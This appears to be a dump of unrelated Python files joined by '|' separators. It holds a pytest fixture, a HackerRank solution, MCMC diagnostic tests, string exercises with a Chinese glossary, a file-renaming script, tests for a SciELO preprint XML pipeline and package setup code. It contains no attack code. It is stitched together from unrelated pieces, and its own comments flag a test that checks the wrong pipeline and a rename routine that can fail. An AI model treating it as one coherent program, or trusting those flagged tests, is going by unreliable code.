        yield renderer
@pytest.fixture
def renderer_mock():
    """SphinxRenderer whose render_inner is stubbed to return 'inner'."""
    stubbed = SphinxRenderer()
    # Stub BEFORE entering the context, matching how tests expect it wired.
    stubbed.render_inner = mock.Mock(return_value="inner")
    with stubbed:
        yield stubbed
|
#!/bin/python3
#
# COMPLETED
#
# PROBLEM:
# http://hr.gs/fnu
import math
import os
import random
import re
import sys
# Complete the twoStrings function below.
# Complete the twoStrings function below.
def twoStrings(s1, s2):
    """Return 'YES' if s1 and s2 share at least one character, else 'NO'.

    Improvement: replaces the manual membership dict + scan with a set
    intersection, which short-circuits the same decision in O(len(s1)+len(s2)).
    """
    return 'YES' if set(s1) & set(s2) else 'NO'
import numpy as np
import pytest
from chainconsumer import ChainConsumer
def test_gelman_rubin_index():
    """A well-mixed chain should pass the Gelman-Rubin diagnostic."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=4)
    assert cc.diagnostic.gelman_rubin(chain=0)
def test_gelman_rubin_index_not_converged():
    """Scaling and shifting the tail of the chain should break convergence."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    samples[80000:, :] = samples[80000:, :] * 2 + 1
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=4)
    assert not cc.diagnostic.gelman_rubin(chain=0)
def test_gelman_rubin_index_not_converged_drift():
    """A linear drift in one parameter should fail Gelman-Rubin.

    Fix: this test previously reused the name
    test_gelman_rubin_index_not_converged, shadowing the earlier test of the
    same name so pytest never collected it; renamed so both run.
    """
    data = np.vstack((np.random.normal(loc=0.0, size=100000),
                      np.random.normal(loc=1.0, size=100000))).T
    data[:, 0] += np.linspace(0, 10, 100000)
    consumer = ChainConsumer()
    consumer.add_chain(data, walkers=8)
    assert not consumer.diagnostic.gelman_rubin(chain=0)
def test_gelman_rubin_index_fails():
    """Requesting a chain index that does not exist raises AssertionError."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=4)
    with pytest.raises(AssertionError):
        cc.diagnostic.gelman_rubin(chain=10)
def test_gelman_rubin_name():
    """The diagnostic accepts a chain selected by its name."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=4, name="testchain")
    assert cc.diagnostic.gelman_rubin(chain="testchain")
def test_gelman_rubin_name_fails():
    """An unknown chain name raises AssertionError."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=4, name="testchain")
    with pytest.raises(AssertionError):
        cc.diagnostic.gelman_rubin(chain="testchain2")
def test_gelman_rubin_unknown_fails():
    """A chain selector that is neither int nor str raises ValueError."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=4, name="testchain")
    with pytest.raises(ValueError):
        cc.diagnostic.gelman_rubin(chain=np.pi)
def test_gelman_rubin_default():
    """With no chain argument, all chains are checked and all converge."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    for label in ("c1", "c2", "c3"):
        cc.add_chain(samples, walkers=4, name=label)
    assert cc.diagnostic.gelman_rubin()
def test_gelman_rubin_default_not_converge():
    """One drifting chain among three should fail the combined diagnostic."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=4, name="c1")
    cc.add_chain(samples, walkers=4, name="c2")
    drifting = samples.copy()
    drifting[:, 0] += np.linspace(-5, 5, 100000)
    cc.add_chain(drifting, walkers=4, name="c3")
    assert not cc.diagnostic.gelman_rubin()
def test_geweke_index():
    """A stationary chain should pass the Geweke diagnostic."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=20, name="c1")
    assert cc.diagnostic.geweke(chain=0)
def test_geweke_index_failed():
    """Shifting the final samples should fail the Geweke diagnostic."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    samples[98000:, :] += 0.5
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=20, name="c1")
    assert not cc.diagnostic.geweke(chain=0)
def test_geweke_default():
    """Both chains pass Geweke; seeded for reproducibility."""
    np.random.seed(0)
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=20, name="c1")
    cc.add_chain(samples, walkers=20, name="c2")
    assert cc.diagnostic.geweke(chain=0)
def test_geweke_default_failed():
    """A shifted second chain should fail the combined Geweke diagnostic."""
    samples = np.column_stack((np.random.normal(loc=0.0, size=100000),
                               np.random.normal(loc=1.0, size=100000)))
    cc = ChainConsumer()
    cc.add_chain(samples, walkers=20, name="c1")
    shifted = samples.copy()
    shifted[98000:, :] += 0.3
    cc.add_chain(shifted, walkers=20, name="c2")
    assert not cc.diagnostic.geweke()
fruit = 'banana'
print(len(fruit))

prefixes = 'JKLMNOPQ'
suffix = 'ack'
# for letter in prefixes:
#     print(letter + suffix)

fruit = 'banana'
print(fruit[3:])  # everything after the first three characters
print(fruit[:3])  # the first three characters
print(fruit[:])   # a copy of the whole string

# Count how many times the letter 'a' appears in the string.
word = 'banana'
count = sum(1 for letter in word if letter == 'a')
print(count)
print(word.upper())
def in_both(word1, word2):
    """Print every letter of word1 (repeats included) that also occurs in word2."""
    for letter in word1:
        if letter in word2:
            print(letter)
# Demonstrate in_both with a separator line before and after.
print("-" * 100)
in_both('apples', 'oranges')
print("-" * 100)
# 术语表
# 对象(object):
# 变量可以引用的东西。现在你将对象和值等价使用。
# 序列(sequence):
# 一个有序的值的集合,每个值通过一个整数索引标识。
# 元素(item):
# 序列中的一个值。
# 索引(index):
# 用来选择序列中元素(如字符串中的字符)的一个整数值。 在Python中,索引从0开始。
# 切片(slice):
# 以索引范围指定的字符串片段。
# 空字符串(empty string):
# 一个没有字符的字符串,长度为0,用两个引号表示。
# 不可变 (immutable):
# 元素不能被改变的序列的性质。
# 遍历(traversal):
# 对一个序列的所有元素进行迭代, 对每一元素执行类似操作。
# 搜索(search):
# 一种遍历模式,当找到搜索目标时就停止。
# 计数器(counter):
# 用来计数的变量,通常初始化为0,并以此递增。
# 方法调用(invocation):
# 执行一个方法的声明.
# 可选参数(optional argument)
# 一个函数或者一个方法中不必要指定的参数。 |
import os
import sys, argparse
import random
# Command-line interface: a starting index and the folder whose files to rename.
parsers = argparse.ArgumentParser()
for flags, text in ((("-i", "--index"), "Please enter begin index"),
                    (("-f", "--folder"), "Please enter folder path")):
    parsers.add_argument(*flags, help=text)
args = parsers.parse_args()
def changeFileName(oldName, newName):
    """Rename a single file from oldName to newName."""
    os.rename(oldName, newName)

def changeAllFileName(beginIndex, folder):
    """Rename every file in `folder` to sequential '<n>.gif' names starting
    at beginIndex (accepted as int or numeric string).

    Fix: the original converted beginIndex to int inside the loop after the
    first use, so the first file's name came from str() of the raw argument;
    convert once up front instead.
    """
    index = int(beginIndex)
    for file in os.listdir(folder):
        changeFileName(folder + '/' + file, folder + '/' + str(index) + '.gif')
        index += 1
def changeAllFileNameSuffer(endIndex, folder):
    """Rename files in `folder` to shuffled '<n>.gif' names drawn from
    0..endIndex-1.

    Fix: removed the leftover debug print of the shuffled index list.
    NOTE(review): raises IndexError if the folder contains more than endIndex
    files, and a shuffled target name may collide with a not-yet-renamed
    source file -- confirm callers guarantee disjoint name sets.
    """
    listIndices = list(range(0, int(endIndex)))
    random.shuffle(listIndices)
    for position, file in enumerate(os.listdir(folder)):
        changeFileName(folder + '/' + file,
                       folder + '/' + str(listIndices[position]) + '.gif')
# Script entry: shuffle-rename the folder's files, then echo the CLI arguments.
changeAllFileNameSuffer(args.index, args.folder)
print(args.index)
print(args.folder)
# coding: utf-8
import unittest
from lxml import etree as ET
from updatepreprint import pipeline_xml
# OAI/Dublin-Core namespace prefixes registered with lxml before parsing.
namespaces = {'dc': 'http://purl.org/dc/elements/1.1/',
              'xmlns': 'http://www.openarchives.org/OAI/2.0/',
              'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
              'oai': 'http://www.openarchives.org/OAI/2.0/'}
for prefix, uri in namespaces.items():
    ET.register_namespace(prefix, uri)
class UpdatePrePrintTests(unittest.TestCase):
    """Placeholder test case; setUp intentionally does nothing yet."""
    def setUp(self):
        pass
# <field name="id">art-S0102-695X2015000100053-scl</field>
class TestDocumentID(unittest.TestCase):
    """pipeline_xml.DocumentID should derive the Solr 'id' field from the
    preprint view URL's trailing number."""
    def test_transform(self):
        """The id field becomes 'preprint_<n>' for identifier .../view/<n>."""
        # NOTE(review): the stray 'OK' after the DOI identifier below looks
        # like leftover edit noise in the fixture -- confirm it is intentional.
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:creator>Trentin,Robson Gonçalves</dc:creator>
        <dc:creator>Modolo,Alcir José</dc:creator>
        <dc:creator>Vargas,Thiago de Oliveira</dc:creator>
        <dc:creator>Campos,José Ricardo da Rocha</dc:creator>
        <dc:creator>Adami,Paulo Fernando</dc:creator>
        <dc:creator>Baesso,Murilo Mesquita</dc:creator>
        <dc:identifier>https://preprints.scielo.org/index.php/scielo/preprint/view/7</dc:identifier>
        <dc:identifier>10.1590/scielopreprints.7</dc:identifier>OK
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.DocumentID().transform(data)
        self.assertEqual(xml.find(".//field[@name='id']").text, 'preprint_7')
# <field name="ur">art-S1980-993X2015000200234</field>
class TestURL(unittest.TestCase):
    """pipeline_xml.URL should copy the preprint view URL into the 'ur' field."""
    def test_transform(self):
        """The first dc:identifier (the view URL) populates field 'ur'."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:identifier>https://preprints.scielo.org/index.php/scielo/preprint/view/7</dc:identifier>
        <dc:identifier>10.1590/scielopreprints.7</dc:identifier>OK
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.URL().transform(data)
        self.assertEqual(
            xml.find(".//field[@name='ur']").text,
            "https://preprints.scielo.org/index.php/scielo/preprint/view/7"
        )
# <field name="au">Marcelo dos Santos, Targa</field>
class TestAuthors(unittest.TestCase):
    """pipeline_xml.Authors should emit one 'au' field per dc:creator."""
    def test_transform(self):
        """All six creators appear, in document order."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:creator>Trentin,Robson Gonçalves</dc:creator>
        <dc:creator>Modolo,Alcir José</dc:creator>
        <dc:creator>Vargas,Thiago de Oliveira</dc:creator>
        <dc:creator>Campos,José Ricardo da Rocha</dc:creator>
        <dc:creator>Adami,Paulo Fernando</dc:creator>
        <dc:creator>Baesso,Murilo Mesquita</dc:creator>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.Authors().transform(data)
        self.assertEqual(
            [
                "Trentin,Robson Gonçalves",
                "Modolo,Alcir José",
                "Vargas,Thiago de Oliveira",
                "Campos,José Ricardo da Rocha",
                "Adami,Paulo Fernando",
                "Baesso,Murilo Mesquita",
            ],
            [node.text for node in xml.findall(".//field[@name='au']")]
        )
# <field name="ti_*">Benefits and legacy of the water crisis in Brazil</field>
class TestTitles(unittest.TestCase):
    """Intended to cover the ti_* title fields."""
    def test_transform(self):
        """Asserts no ti_* fields are produced.

        NOTE(review): this runs pipeline_xml.Authors(), not a Titles pipeline,
        so the assertIsNone checks pass trivially (Authors never writes ti_*
        fields). This looks like a copy-paste slip -- confirm which pipeline
        and which expectations were intended before changing it.
        """
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:title xml:lang="en-US">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:title>
        <dc:title xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:title>
        <dc:title xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:title>
        <dc:title xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:title>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.Authors().transform(data)
        self.assertIsNone(xml.find(".//field[@name='ti_en']"))
        self.assertIsNone(xml.find(".//field[@name='ti_es']"))
        self.assertIsNone(xml.find(".//field[@name='ti_pt']"))
        self.assertIsNone(xml.find(".//field[@name='ti_fr']"))
# <field name="doi">10.1590/S0102-67202014000200011</field>
class TestDOI(unittest.TestCase):
    """pipeline_xml.DOI should pick the DOI identifier into the 'doi' field."""
    def test_transform(self):
        """The second dc:identifier (the DOI) populates field 'doi'."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:identifier>https://preprints.scielo.org/index.php/scielo/preprint/view/7</dc:identifier>
        <dc:identifier>10.1590/scielopreprints.7</dc:identifier>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.DOI().transform(data)
        self.assertEqual(
            xml.find(".//field[@name='doi']").text,
            '10.1590/scielopreprints.7')
# <field name="la">en</field>
class TestLanguages(unittest.TestCase):
    """pipeline_xml.Languages should map ISO 639-2 dc:language codes to the
    two-letter codes used in the 'la' field."""
    def test_transform_returns_pt(self):
        """'por' maps to 'pt'."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:language>por</dc:language>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.Languages().transform(data)
        self.assertEqual(xml.find(".//field[@name='la']").text, "pt")
    def test_transform_returns_en(self):
        """'eng' maps to 'en'."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:language>eng</dc:language>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.Languages().transform(data)
        self.assertEqual(xml.find(".//field[@name='la']").text, "en")
    def test_transform_returns_es(self):
        """'spa' maps to 'es'."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:language>spa</dc:language>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.Languages().transform(data)
        self.assertEqual(xml.find(".//field[@name='la']").text, "es")
# <field name="fulltext_pdf_pt">http://www.scielo.br/pdf/ambiagua/v10n2/1980-993X-ambiagua-10-02-00234.pdf</field>
# <field name="fulltext_pdf_pt">http://www.scielo.br/scielo.php?script=sci_abstract&pid=S0102-67202014000200138&lng=en&nrm=iso&tlng=pt</field>
class TestFulltexts(unittest.TestCase):
    """pipeline_xml.Fulltexts should combine the view URL with the document
    language into a fulltext_html_<lang> field."""
    def test_transform(self):
        """With dc:language 'eng', the view URL lands in fulltext_html_en."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:identifier>https://preprints.scielo.org/index.php/scielo/preprint/view/7</dc:identifier>
        <dc:identifier>10.1590/scielopreprints.7</dc:identifier>
        <dc:language>eng</dc:language>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.Fulltexts().transform(data)
        self.assertEqual(
            xml.find(".//field[@name='fulltext_html_en']").text,
            'https://preprints.scielo.org/index.php/scielo/preprint/view/7')
# <field name="da">2015-06</field>
class TestPublicationDate(unittest.TestCase):
    """pipeline_xml.PublicationDate should copy dc:date into the 'da' field."""
    def test_transform(self):
        """The dc:date value is preserved verbatim in field 'da'."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:date>2020-03-20</dc:date>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.PublicationDate().transform(data)
        self.assertEqual(xml.find(".//field[@name='da']").text, "2020-03-20")
# <field name="ab_*">In this editorial, we reflect on the benefits and legacy of the water crisis....</field>
class TestAbstract(unittest.TestCase):
    """pipeline_xml.Abstract should emit one ab_<lang> field per
    dc:description, keyed on the xml:lang attribute."""
    def test_transform(self):
        """Descriptions in es/pt/fr produce ab_es, ab_pt and ab_fr fields."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:description xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
        <dc:description xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
        <dc:description xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.Abstract().transform(data)
        self.assertIsNotNone(xml.find(".//field[@name='ab_es']"))
        self.assertIsNotNone(xml.find(".//field[@name='ab_pt']"))
        self.assertIsNotNone(xml.find(".//field[@name='ab_fr']"))
# <field name="AvailableLanguages">en</field>
# <field name="AvailableLanguages">pt</field>
class TestAvailableLanguages(unittest.TestCase):
    """pipeline_xml.AvailableLanguages should list each distinct description
    language once in 'available_languages' fields."""
    def test_transform(self):
        """es/pt/fr descriptions yield exactly those three language codes."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
        <record>
        <metadata>
        <oai_dc:dc
        xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
        xmlns:dc="http://purl.org/dc/elements/1.1/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
        http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
        <dc:description xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
        <dc:description xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
        <dc:description xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
        </oai_dc:dc>
        </metadata>
        </record>
        </root>
        """
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.AvailableLanguages().transform(data)
        result = xml.findall('./field[@name="available_languages"]')
        self.assertEqual(['es', 'fr', 'pt'], sorted([i.text for i in result]))
# <field name="keyword_*"></field>
class TestKeywords(unittest.TestCase):
    def test_transform(self):
        """Keywords emits one ``keyword_<lang>`` field per ``dc:subject`` entry."""
        source = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:subject xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
        doc = ET.Element("doc")
        record = ET.fromstring(source)
        record, doc = pipeline_xml.Keywords().transform((record, doc))
        # The fixture above carries 3 es-ES, 2 pt-BR and 4 fr-FR subjects.
        for lang, expected_count in (("es", 3), ("pt", 2), ("fr", 4)):
            fields = doc.findall(".//field[@name='keyword_%s']" % lang)
            self.assertEqual(expected_count, len(fields))
# <field name="is_citable">is_true</field>
class TestIsCitable(unittest.TestCase):
    def test_transform(self):
        """IsCitable tags every document with ``is_citable=is_true``."""
        source = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
</record>
</root>
"""
        doc = ET.Element("doc")
        record = ET.fromstring(source)
        record, doc = pipeline_xml.IsCitable().transform((record, doc))
        field = doc.find(".//field[@name='is_citable']")
        self.assertEqual("is_true", field.text)
# <field name="use_license"></field>
# <field name="use_license_text"></field>
# <field name="use_license_uri"></field>
class TestPermission(unittest.TestCase):
    def test_transform(self):
        """Permission extracts the license text and URI from ``dc:rights``."""
        text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:rights xml:lang="pt-BR">Copyright (c) 2020 Julio Croda, Wanderson Kleber de Oliveira, Rodrigo Lins Frutuoso, Luiz Henrique Mandetta, Djane Clarys Baia-da-Silva, José Diego Brito-Sousa, Wuelton Marcelo Monteiro, Marcus Vinícius Guimarães Lacerda</dc:rights>
<dc:rights xml:lang="pt-BR">https://creativecommons.org/licenses/by/4.0</dc:rights>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
        xml = ET.Element("doc")
        raw = ET.fromstring(text)
        data = raw, xml
        raw, xml = pipeline_xml.Permission().transform(data)
        # BUG fix: the original first assertion queried the non-existent field
        # name 'use_license_ur' (typo) — find() returned None, so `.text`
        # raised AttributeError — and it merely duplicated the
        # 'use_license_uri' check below, so it is dropped.
        self.assertEqual(
            xml.find(".//field[@name='use_license_text']").text,
            "Copyright (c) 2020 Julio Croda, Wanderson Kleber de Oliveira, Rodrigo Lins Frutuoso, Luiz Henrique Mandetta, Djane Clarys Baia-da-Silva, José Diego Brito-Sousa, Wuelton Marcelo Monteiro, Marcus Vinícius Guimarães Lacerda",
        )
        self.assertEqual(
            xml.find(".//field[@name='use_license_uri']").text,
            "https://creativecommons.org/licenses/by/4.0"
        )
|
# Public API of the package, declared ahead of the imports it names.
__all__ = ['priors', 'logging', 'gpu_utils', 'utils', 'driver',
           'fit_model', 'galaxy', 'instrument', 'isochrones', 'plotting',
           'results', 'metalmodels', 'agemodels', 'dustmodels',
           'distancemodels', 'sfhmodels', 'data', '__version__']
# Re-export the sub-modules that make up the public API.
from .simulation import gpu_utils
from . import instrument
from .simulation import driver
from .isochrones import isochrones
from .galaxy import (galaxy, metalmodels, dustmodels, sfhmodels,
                     distancemodels)
from .sampling import (fit_model, priors, logging, results)
from .utils import (utils)
from .plotting import (plotting)
# from .results import (results)
from . import data
# Package-level flags mirroring the GPU detection performed in gpu_utils.
GPU_AVAIL = gpu_utils._GPU_AVAIL
GPU_ACTIVE = gpu_utils._GPU_ACTIVE
# rename for backwards compatibility
gpu_utils._CUDAC_AVAIL = GPU_ACTIVE
# Old alias for the SFH model module, kept for backwards compatibility.
agemodels = sfhmodels
__version__ = "0.9.3"
|
'''
用画刷填充图形区域
'''
import math
import random
import sys
import threading
from PyQt5 import QtCore
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from com.music_Play import MyThread
class musicGraphy(QWidget):
    """Frameless, always-on-top widget that visualizes audio waveform data.

    Waveform samples come from a background ``MyThread`` player
    (``self.musicPlay.wavedata``). ``paintEvent`` renders them with one of
    five drawing styles selected by ``self.type``, and ``playVisible``
    re-arms a 0.1 s timer so the widget repaints continuously.
    """

    def __init__(self):
        super(musicGraphy, self).__init__()
